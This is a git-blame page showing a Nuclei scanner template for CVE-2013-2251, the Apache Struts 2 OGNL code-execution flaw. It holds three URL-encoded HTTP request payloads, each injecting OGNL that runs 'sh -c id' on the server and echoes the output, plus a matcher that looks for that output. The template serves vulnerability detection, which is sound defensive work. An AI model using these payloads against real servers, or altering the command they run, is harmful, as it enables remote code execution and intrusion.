daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2013/CVE-2013-2251.yaml

50 lines
2.8 KiB
YAML
Raw Normal View History

cve id updates
2021-01-02 05:02:50 +00:00
id: CVE-2013-2251
add cve-2013-2251
2020-10-13 22:06:01 +00:00
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
Update CVE-2013-2251.yaml
2021-06-15 11:11:14 +00:00
author: exploitation,dwisiswant0,alex
add cve-2013-2251
2020-10-13 22:06:01 +00:00
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
Description and references
2021-04-22 09:02:19 +00:00
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
improved matcher and tags update
2021-02-22 07:01:32 +00:00
tags: cve,cve2013,rce,struts,apache
add cve-2013-2251
2020-10-13 22:06:01 +00:00
requests:
:hammer: Fix false-positive for CVE-2013-2251
2020-11-25 00:26:52 +00:00
- payloads:
params:
- "redirect"
- "action"
- "redirectAction"
raw:
- |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
Update CVE-2013-2251.yaml Add new payload. Test it on this environment-https://github.com/vulhub/vulhub/tree/master/struts2/s2-016
2021-06-11 09:50:50 +00:00
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
add cve-2013-2251
2020-10-13 22:06:01 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
:hammer: Fix false-positive for CVE-2013-2251
2020-11-25 00:26:52 +00:00
- 400
condition: or
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
add cve-2013-2251
2020-10-13 22:06:01 +00:00
part: body